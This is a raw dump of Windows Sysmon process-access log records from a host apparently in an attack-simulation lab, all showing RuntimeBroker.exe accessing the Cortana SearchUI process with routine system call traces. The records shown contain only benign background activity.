13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 